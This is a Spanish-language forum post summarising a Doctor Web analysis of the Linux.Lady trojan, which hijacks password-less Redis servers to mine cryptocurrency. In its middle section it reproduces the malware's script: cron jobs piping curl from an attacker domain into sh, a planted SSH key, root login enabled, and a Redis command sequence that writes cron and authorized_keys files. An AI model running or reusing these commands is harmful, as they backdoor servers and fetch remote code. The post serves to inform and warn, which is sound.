El libre pensamiento para un internet libre
No estas registrado.
Hay tan pocos troyanos para Linux que es casi todo un evento cuando sale uno.
El problema para ellos es que no pasan desaparecidos mucho tiempo: No es fácil esconderse en un código abierto.
Los de Doctorweb acaban de publicar un reporte sobre uno de estos bichos raros pillado en acción que responde al nombre de Linux.Lady
Linux.Lady.1 @ Doctor Web Antivirus
Es un malware que afecta a las distribuciones Linux para servidores
Explota la "ignorancia" (o falta de atención) de los administradores lo más descuidados (o ignorantes): Compromete los sistemas que emplean Redis NoSQL por defecto y que no tienen una contraseña habilitada/configurada para limitar el uso este programa.
A pesar de que "proteger con contraseña" sea la base de este oficio y la piedra angular de la seguridad, se estima que podría haber hasta 30 000 servidores vulnerables.
Parte de la responsabilidad cae en los hombros de VMware y Pivotal (los que lanzaron Redis) por proponer une configuración por defecto insegura.
Los datos SQL son un tesoro a proteger.
Redis se promociona como siendo "liviano y rápido"
Es justamente por falta de proceso de identificación que logra estos aparentes buenos resultados...
Sacrificar la seguridad para engañar a los más bobos no está bien...
Hay que reconocer que nuestra Linux.Lady tiene clase.
No es un virus destructivo a lo tonto sino un parásito que sabe encontrar el equilibrio entre chupar los recursos de su huésped y dejarlo vivo.
Con capacidad a propagarse.
Sus principales características son
Recoge información sobre la maquina infectada y la manda al servidor de control remoto
Descarga y instala en la maquina infectada un programa de criptografía
Ataca los otros ordenadores de la red para auto-replicarse
En resumen es un malware que crea un parque de zombis dedicados a "minar Bit Coins"
El troyano crea un ejecutable /usr/sbin/ntp y un fichero de configuración /etc/systemd/system/ntp.service que tiene esta pinta:
[Unit]
Description=NTP daemon
ConditionFileIsExecutable=/usr/sbin/ntp
[Service]
StartLimitInterval=5
StartLimitBurst=10
ExecStart=/usr/sbin/ntp "-D"
Restart=always
RestartSec=120
[Install]
WantedBy=multi-user.target
Una vez cómodamente instalada; La Linux.Lady empieza su labor y crea cuatros canales.
Manda al servidor remoto información sobre la maquina infectada:
Versión de Lady.Linux
Cuantas CPU tiene la maquina infectada
nombre del huésped
Cuantos procesos están corriendo
nombre del Sistema Operativo
A que "familia" pertenece el sistema operativo
Tiempo de actividad el huésped
A cambio de esto recibe un fichero de configuración a medida para entrar en acción: Descargar, instalar y ejecutar un programa de criptografía (escrito en lenguaje go) para minar BitCoins.
Determina una IP externa para establecer una conexión directa hacía el servidor del atacante usando el puerto 6379 sin autenticarse (es el puerto que usa Redis)
Si consigue contactar con el servidor descarga desde la url del fichero de configuración un script ( Linux.DownLoader.196,) que instala en el cron scheduler (planificación de procesos/rutinas programadas)
Esto es lo que hace nuestra "Lady"
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/10 * * * * curl -fsSL http://r.*****ring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fsSL http://r. *****ring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi
if [ ! -f "/etc/init.d/ntp" ]; then
if [ ! -f "/etc/systemd/system/ntp.service" ]; then
mkdir -p /opt
curl -fsSL http://r. ****ring.com/v51/lady_`uname -m` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 -Install
fi
fi
/etc/init.d/ntp start
ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
Una vez la conexión establecida el troyano ejecuta estas ordenes
config set stop-writes-on-bgsave-error no
config set rdbcompression no
config set dir /var/spool/cron
config set dbfilename root
set 1 ("\n\n*/1 * * * * curl -L %s | sh\n\n") % (ShellUrl из конфига)
save
config set dir /root/.ssh
config set dbfilename authorized_keys
set 1 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA4TjWxZeA8JlaBwfvgtjvDT0bm9d4JGbzz1KIIGyvSKxd7bqYLwXfxr0Q+tZxF5nHXldH2pRNacD7Gm8XX4aZCUYlL5Ev0goYmOTgXOQNkgyVQKPE6KGV5BZpNoB2sbIkuweLbbdZaOcncnFvAEh7dVUQ5lh2QLz/IuRzakrzaJeTPiaD3BAyXhjcVwDFn1Lb84uiqc7nW6gw2bIaSMOrNTfZH/xftGdI'UpJoQK06jmFrTlpWaL5joAooc2Evan6XnqkO4g5In7tjhX8pBtCBGk78SKCJmkEjK'+xbN+7oZhuaeB/ubPm3xDahi+w1xHGZIt/N7z268Fz3rQAhBUZ+eQ==
save
del 1
set dir /tmp
set dbfilename dump.rdb
config set rdbcompression yes
Incluyendo así una llave SSH valida para conectarse mediante este protocolo desde el sistema huésped hacia el servidor remoto.
La maquina infectada ejecutará por SSH y con esta llave
(curl -fsSL %s?ssh | sh) % (ShellUrl)
Para instalar el programa para minar Bit Coins
Se trata de un conjunto de librerías "Go" alojadas en GitHub
Podéis ver aquí su arborescencia (No se ve muy bien, lo siento, así es la captura que pusieron)
Más lectura
Linux.Lady trojan turns Linux servers into bitcoin miners de Graeme BURTON @ The Enquirer
Desconectado
Tema | Respuestas | Vistas | Ultimo mensaje |
---|---|---|---|
9 | 327 | Ayer 21:19:07 por elEstudiante | |
0 | 126 | 26-01-2023 19:35:15 por kcdtv | |
Pegado: |
24 | 2200 | 26-01-2023 19:00:06 por Koala |
2 | 229 | 20-01-2023 17:47:01 por kcdtv | |
3 | 393 | 17-01-2023 22:46:55 por kcdtv |
Ultimo usuario registrado: Ankaa
Usuarios registrados conectados: 0
Invitados conectados: 12
Número total de usuarios registrados: 2,421
Número total de temas: 1,628
Número total de mensajes: 15,485
Atom tema feed - Impulsado por FluxBB